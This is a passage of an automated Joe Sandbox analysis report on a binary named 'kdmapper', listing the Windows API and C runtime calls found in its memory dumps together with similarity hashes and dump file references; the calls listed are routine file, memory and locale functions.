                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00DED710,00000000,00000000,?,00E0ACDB,00DED710,00000000,00000000,00000000,?,00E0AED8,00000006,FlsSetValue), ref: 00E0AD66
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00E0ACDB,00DED710,00000000,00000000,00000000,?,00E0AED8,00000006,FlsSetValue,00E17970,FlsSetValue,00000000,00000364,?,00E098B7), ref: 00E0AD72
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E0ACDB,00DED710,00000000,00000000,00000000,?,00E0AED8,00000006,FlsSetValue,00E17970,FlsSetValue,00000000), ref: 00E0AD80
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                              • Opcode ID: b8d4190e516937e9f149e338f3a034df7a2071873aba66166892c0e1e5d0e816
                                                                                                                                                                                                              • Instruction ID: 2d86b89a9c450ee20ff7feb4fb38b0499cebde2f23d981d37a7d1afb446f66f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8d4190e516937e9f149e338f3a034df7a2071873aba66166892c0e1e5d0e816
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA014C3621132AAFC7314E799C449DB7B98EF457AA7184234F906F35D0C730C845C6E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00E097E5: GetLastError.KERNEL32(?,00E21030,00E04674,00E21030,?,?,00E03F73,00000050,?,00E21030,00000200), ref: 00E097E9
                                                                                                                                                                                                                • Part of subcall function 00E097E5: _free.LIBCMT ref: 00E0981C
                                                                                                                                                                                                                • Part of subcall function 00E097E5: SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E0985D
                                                                                                                                                                                                                • Part of subcall function 00E097E5: _abort.LIBCMT ref: 00E09863
                                                                                                                                                                                                                • Part of subcall function 00E0BB4E: _abort.LIBCMT ref: 00E0BB80
                                                                                                                                                                                                                • Part of subcall function 00E0BB4E: _free.LIBCMT ref: 00E0BBB4
                                                                                                                                                                                                                • Part of subcall function 00E0B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E0BA44,?), ref: 00E0B7E6
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0BA9F
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0BAD5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                              • String ID: p
                                                                                                                                                                                                              • API String ID: 2991157371-2678736219
                                                                                                                                                                                                              • Opcode ID: acb5fa81ba32e2cbd51e3ebc036edc607a45f734ae4f49322899f3444fb75ae7
                                                                                                                                                                                                              • Instruction ID: d810b15c0b97a6becb347a48e85a3fc82f9cdba684911cf1f94fa5f9ba047169
                                                                                                                                                                                                              • Opcode Fuzzy Hash: acb5fa81ba32e2cbd51e3ebc036edc607a45f734ae4f49322899f3444fb75ae7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32319331A04209AFDB10EFA9D541B99B7F5FF40324F255199E904BB2E2EB325D80DB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00DED343,00000001,?,?,?,00000000,00DF551D,?,?,?), ref: 00DE9F9E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00DF551D,?,?,?,?,?,00DF4FC7,?), ref: 00DE9FE5
                                                                                                                                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00DED343,00000001,?,?), ref: 00DEA011
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite$Handle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4209713984-0
                                                                                                                                                                                                              • Opcode ID: 81386bf007db3ec8e31e0d96200f7cf78a72da9a6e59b311357426e638befdc2
                                                                                                                                                                                                              • Instruction ID: 911c6bdd330fb2860369fceabd6dc5bc0384190d86964decabc47f8f733f6f61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81386bf007db3ec8e31e0d96200f7cf78a72da9a6e59b311357426e638befdc2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D31E231204386AFDB14EF26D818BAEB7A5FF84715F04491DF981A7290C775AD48CBB2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DEC27E: _wcslen.LIBCMT ref: 00DEC284
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA2D9
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA30C
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA329
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2260680371-0
                                                                                                                                                                                                              • Opcode ID: 9caa078a015533cac98843d5053cfb102d74dc0130f2fc7a784ae3121d433945
                                                                                                                                                                                                              • Instruction ID: 6ce2c615ce5a361a8785fda5b6dcde9c0b4c904e39f5f53c4d5b12e5c8db22f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9caa078a015533cac98843d5053cfb102d74dc0130f2fc7a784ae3121d433945
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8301D831200296AAEF21BBBB4C09BFD3388DF0A780F088415F941E6092D754EA81C6B6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E0B8B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                                                                                                                              • Opcode ID: 6a52315c8f0d773339c47f3bfcd155d9420a2144617434857ee3cd07c49991fa
                                                                                                                                                                                                              • Instruction ID: 93db31d6fa4467451a896eb7164d6a39501c271817cff25674b88ccbddd79e0b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a52315c8f0d773339c47f3bfcd155d9420a2144617434857ee3cd07c49991fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E41197090434C9EDF218E64CC84BF6BBF9EB45308F5454EDE69AA6182D3359A85CF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00E0AFDD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String
                                                                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                                                                                                                              • Opcode ID: 23b46d94e7f79f25ab36c2f9333b34114ab1e27c1dedbed95ddc2e8483d3e8b3
                                                                                                                                                                                                              • Instruction ID: 87522971743af5eeb6fd3769c96c267a44bfc751e72eadf579d81db1ae746dba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23b46d94e7f79f25ab36c2f9333b34114ab1e27c1dedbed95ddc2e8483d3e8b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E010C3260420DBBCF12AF91DC05DEE7F62EF48754F458155FE14761A0C6728971EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E0A56F), ref: 00E0AF55
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                              • API String ID: 2593887523-3084827643
                                                                                                                                                                                                              • Opcode ID: dcccf0a31de7bd0db662de5a3bb4de494a921a07920bfd73334ae35d4d016221
                                                                                                                                                                                                              • Instruction ID: 2dc739fdbc4e39e191c28e8b2560a6b0a7822c1562a2250b09c4ef1c6ffa68b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcccf0a31de7bd0db662de5a3bb4de494a921a07920bfd73334ae35d4d016221
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F0B43168530CBFCB116F61CC06CEEBF61EF44B11B058065FD087A2A0DA714A549795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc
                                                                                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                                                                                              • API String ID: 2773662609-671089009
                                                                                                                                                                                                              • Opcode ID: 302a336844534d57da2695df45fa6457b1de2ff10ee5d83aa05ca8b095d20cd6
                                                                                                                                                                                                              • Instruction ID: d7cf6b631c06db74d297475edaa056ba9079e33dc55012b4a8d3784e6914d889
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 302a336844534d57da2695df45fa6457b1de2ff10ee5d83aa05ca8b095d20cd6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE0553068131C7BC200AF26CC069EEBBA4CB84B20B0650A9FC05B7280CD704EC482D6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00E0B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E0BA44,?), ref: 00E0B7E6
                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E0BA89,?,00000000), ref: 00E0BC64
                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00E0BA89,?,?,?,00E0BA89,?,00000000), ref: 00E0BC77
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                                                              • Opcode ID: c33401fed100f3a697c7850abe4b4601a7ccb073f4ca529cff94418d8760db59
                                                                                                                                                                                                              • Instruction ID: 327963d4486b41a66f1d32b172f15b6a65594eea3b931747c3a30a50afde3ed6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c33401fed100f3a697c7850abe4b4601a7ccb073f4ca529cff94418d8760db59
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 205146709002459EEB248F71C8816FAFBE5FF41304F18946ED496BB2D1D7349985CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00DE9A50,?,?,00000000,?,?,00DE8CBC,?), ref: 00DE9BAB
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00DE8411,-00009570,00000000,000007F3), ref: 00DE9BB6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                              • Opcode ID: 19fd70a865d0dad8c522710f2fff8dff39667c1c58041c969bee9e60353996e1
                                                                                                                                                                                                              • Instruction ID: 5ebccf4588636935698c8451942ba463a5c3ad9f9502bddb316e74bb9c198455
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19fd70a865d0dad8c522710f2fff8dff39667c1c58041c969bee9e60353996e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9141B0705063818FDB24EF2AE5E446AF7E6FFD4320F198A2DE89583260D770ED448A71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE1E55
                                                                                                                                                                                                                • Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DE1EFD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog$_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2838827086-0
                                                                                                                                                                                                              • Opcode ID: bb3bfe64002af2602a81b7f873440a7698b8e1dcc758b5f4ccfd57ac85319914
                                                                                                                                                                                                              • Instruction ID: 19abde93453b15353299eaeb65fece9b3a85bf6cf5bb916e99b7c9ab5e21e96a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb3bfe64002af2602a81b7f873440a7698b8e1dcc758b5f4ccfd57ac85319914
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65313875A04249AACF11EF99C945AEEBBF5EF48300F144069F845A7251C7325E51CB70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00DE73BC,?,?,?,00000000), ref: 00DE9DBC
                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$BuffersFlushTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1392018926-0
                                                                                                                                                                                                              • Opcode ID: b91b93d1122c9a7b2622643343fe4d108940e370b2582dd02d9394881236eb39
                                                                                                                                                                                                              • Instruction ID: ac5be0775c8bab2a475124269c3e2d745596ccf85b1e3da9a6b2bfad391d34ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b91b93d1122c9a7b2622643343fe4d108940e370b2582dd02d9394881236eb39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F521D03224A295EFC714EF76C8A1AABFBE4AF95704F08891CF4C587141D329E90D9B71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00DE9F27,?,?,00DE771A), ref: 00DE96E6
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00DE9F27,?,?,00DE771A), ref: 00DE9716
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              • Opcode ID: c131f2c4ae5566dafcd45b0dfdb29c8b506af589b8f0c74197fc7a20c0bc148d
                                                                                                                                                                                                              • Instruction ID: 3bbf658b08e3b857b5d96dc98c1b5e22efd22e5a8393c56401cee8d2d43ede4d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c131f2c4ae5566dafcd45b0dfdb29c8b506af589b8f0c74197fc7a20c0bc148d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5321CF71100384AFE330AA66CC89BF7B7ECEB49324F044A1EFAD5C21D1C774A8848671
